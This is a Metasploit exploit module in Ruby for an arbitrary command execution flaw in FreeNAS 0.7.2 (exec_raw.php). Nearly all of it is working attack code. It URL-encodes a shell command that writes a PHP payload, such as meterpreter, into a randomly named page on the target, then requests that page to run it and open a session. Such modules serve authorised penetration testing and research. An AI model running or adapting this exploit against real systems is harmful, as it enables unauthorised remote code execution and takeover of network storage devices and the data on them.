metasploit-gs/modules/exploits/multi/http/freenas_exec_raw.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'FreeNAS exec_raw.php Arbitrary Command Execution',
      'Description'    => %q{
          This module exploits an arbitrary command execution flaw
        in FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL
        to the exec_raw.php page, an attacker may be able to execute arbitrary
        commands.

        NOTE: This module works best with php/meterpreter payloads.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '94441' ],
          [ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ]
        ],
      'Payload'	=>
        {
          'Space'    => 6144,
          'DisableNops' => true,
          'BadChars'    => "`\"' %&x",
        },
      'Targets'	=>
        [
          [ 'Automatic Target', { } ]
        ],
      'Privileged' => true,
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'DisclosureDate' => '2010-11-06',
      'DefaultTarget' => 0))
  end

  def exploit

    page = rand_text_alpha_upper(rand(5) + 1 ) + ".php"

    shellcode = payload.encoded

    sploit = "echo \"<?php\n#{shellcode}\n?>\" > #{page}"

    print_status("Sending exploit page '#{page}'")

    res = send_request_raw(
      {
        'uri'	=> "/exec_raw.php?cmd=" + Rex::Text.uri_encode(sploit),
      }, 10)

    if (res and res.code == 200)
      print_status("Triggering payload...")
      send_request_raw({ 'uri' => "/#{page}" }, 5)
      handler
    else
      print_error("Exploit failed")
      return
    end

  end
end